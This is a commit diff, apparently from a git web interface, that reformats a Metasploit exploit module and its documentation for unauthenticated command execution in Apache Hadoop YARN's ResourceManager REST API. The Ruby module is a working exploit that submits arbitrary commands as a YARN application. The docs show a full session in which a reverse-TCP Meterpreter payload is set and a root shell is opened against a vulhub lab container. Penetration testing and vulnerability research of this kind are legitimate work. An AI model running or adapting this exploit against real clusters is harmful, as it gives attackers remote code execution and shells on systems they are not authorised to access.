parent
aa3fcea377
commit
50252c75d6
|
@ -1,21 +1,21 @@
|
|||
## Description
|
||||
## Description
|
||||
|
||||
This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
|
||||
|
||||
## Vulnerable Application
|
||||
## Vulnerable Application
|
||||
|
||||
**Vulnerable Application Link**
|
||||
**Vulnerable Application Link**
|
||||
|
||||
- docker
|
||||
- docker
|
||||
|
||||
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
|
||||
|
||||
## Vulnerable Application Installation Setup.
|
||||
|
||||
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
|
||||
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
|
||||
|
||||
|
||||
## Verification Steps
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
|
@ -33,11 +33,11 @@ Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up
|
|||
9. You should get a shell.
|
||||
|
||||
|
||||
## Scenarios
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/hadoop_unauth_exec
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
msf5 > use exploit/linux/http/hadoop_unauth_exec
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
|
||||
Module options (exploit/linux/http/hadoop_unauth_exec):
|
||||
|
||||
|
@ -61,11 +61,11 @@ Exploit target:
|
|||
0 Automatic
|
||||
|
||||
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
|
||||
rhost => 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141
|
||||
rhost => 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > show options
|
||||
|
||||
Module options (exploit/linux/http/hadoop_unauth_exec):
|
||||
|
||||
|
@ -97,16 +97,16 @@ Exploit target:
|
|||
0 Automatic
|
||||
|
||||
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141
|
||||
lhost => 192.168.77.141
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
|
||||
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.77.141:4444
|
||||
[*] Started reverse TCP handler on 192.168.77.141:4444
|
||||
[*] Sending Command
|
||||
[*] Command Stager progress - 100.00% done (763/763 bytes)
|
||||
[*] Sending stage (853256 bytes) to 172.20.0.3
|
||||
[*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
```
|
||||
```
|
||||
|
|
|
@ -4,6 +4,7 @@
|
|||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -18,38 +19,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'cbmixx', # Proof of concept
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
'cbmixx', # Proof of concept
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
|
||||
[ 'URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
|
||||
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
|
||||
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
|
||||
],
|
||||
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {} ],
|
||||
['Automatic', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 19 2016',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
))
|
||||
|
||||
register_options([Opt::RPORT(8088)])
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError => e
|
||||
rescue Rex::ConnectionError
|
||||
vprint_error("#{peer} - Connection failed")
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
@ -68,26 +66,27 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def execute_command(cmd, opts = {})
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
||||
'method' => 'POST'
|
||||
)
|
||||
|
||||
app_id = res.get_json_document['application-id']
|
||||
|
||||
post = {
|
||||
'application-id' => app_id,
|
||||
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
|
||||
'application-type' => 'YARN',
|
||||
'am-container-spec' => {
|
||||
'commands' => {'command' => cmd.to_s},
|
||||
'application-id' => app_id,
|
||||
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
|
||||
'application-type' => 'YARN',
|
||||
'am-container-spec' => {
|
||||
'commands' => {'command' => cmd.to_s}
|
||||
}
|
||||
}
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/json',
|
||||
'data' => post.to_json
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/json',
|
||||
'data' => post.to_json
|
||||
)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue